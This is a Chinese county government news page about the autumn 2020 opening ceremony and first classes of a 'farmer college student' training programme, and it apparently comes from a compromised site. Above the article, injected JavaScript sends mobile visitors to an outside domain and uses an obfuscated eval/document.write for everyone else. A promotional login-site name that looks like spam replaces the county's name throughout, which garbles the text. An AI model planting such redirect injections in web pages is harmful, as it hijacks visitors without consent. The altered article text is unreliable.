function moble(){ var ss = '
'; if ((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { window.location.href = "http://fd699.vip" }else{ eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); } } moble();


当前位置: 福德正神登录官网 > 政务动态 > 部门动态

福德正神登录官网举行2020年秋季“农民大学生培养计划”新生开学典礼暨面授培训
发布时间: 2020-11-04 09:07来源:县教师进修学校作者:黄芳华【字体: 浏览量:1

10月30日,福德正神登录官网2020年秋季“农民大学生培养计划”新生开学典礼暨面授培训在职教新城培训楼举行,县教师进修学校副校长祝卫芬主持,县委组织部、县进修学校、县电大等单位相关负责人及115新生参加。

首先为同学们讲话的是县电大工作站站长李湘波,他提出了三个要求:怀感恩之心,珍惜学习机会;克服困难,争取学有所成;遵规守纪,遵守诚信,自觉维护电大形象。李站长语重心长地对学员说到,要珍惜来之不易的学习机会,自觉主动地完成学习任务。

其次,县委组织部干部教育组负责人何高浩也提了三个要求:机会难得,且珍惜;认真学习,求成效;遵守规定,做好集中面授、自主学习、网络学习相结合。

紧接着,祝卫芬寄予了三个希望,希望同学们珍惜机会,认真学习;转变身份,遵守纪律;大胆实践,学有所用。 

开班仪式后,学员进行了新生班团建设、入学教育、形势与政策、个人理财、思想道德修养与法律基础等课程的集中面授。班主任黄芳华老师通过班团建设课,组建了学习共同体,以“找朋友”的形式成功分组,民主选举成立了班委会;集益乡纪委书记陈文斌在《形势与政策》课程中谈到,集中力量办大事是中国制度优越性的显著体现,使学员深知生为中国人,我们感到无比的自豪。

福德正神登录官网下午,县华融湘江银行范泽宇为大家讲解《个人理财》;县教师进修学校何建英上《福德正神开放大学入学指南》,带领大家熟悉了空间教学平台操作方法和学习流程;县教师进修学校校长谷财有为学员讲授《思想道德修养与法律基础》,谷校长提到新时代的变与不变,变得是物质需求,物质水平, 不变的是政治制度和政治文化,党和福德正神需要培养担当民族复兴大任的时代新人,应该做一个有理想有本领,有担当的时代新人。

图1:开班典礼

 

图2:黄芳华老师主讲《新生班团建设》

 

图3:陈文斌老师主讲《形式与政策》

 

图4:范泽宇老师主讲《个人理财》

 

图5:何建英老师主讲《福德正神开放大学入学指南》


 

扫一扫在手机打开当前页